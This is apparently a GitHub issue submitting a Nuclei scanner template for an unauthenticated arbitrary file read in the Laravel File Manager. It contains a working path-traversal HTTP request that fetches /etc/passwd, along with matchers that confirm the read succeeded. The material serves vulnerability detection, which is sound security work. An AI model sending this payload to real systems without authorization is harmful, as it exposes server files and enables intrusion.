### ISSUE TITLE
[nuclei-template] 

### ISSUE THREAD

**Issue by Chakraborty-Arpan** [projectdiscovery/nuclei-templates#3849]
### Template Information:

id: laravel-arbitrary-file-read

info:
  author: hackerarpan
  name: Unauthenticated arbitrary-file-read
  severity: medium
  tags: arbitrary-file-read
  reference:
    - https://www.exploit-db.com/exploits/48166

### Nuclei Template:

```yaml
requests:
  - raw:
      - |
        GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        words:
          - root
        part: body

      - type: status
        status:
          - 200
```
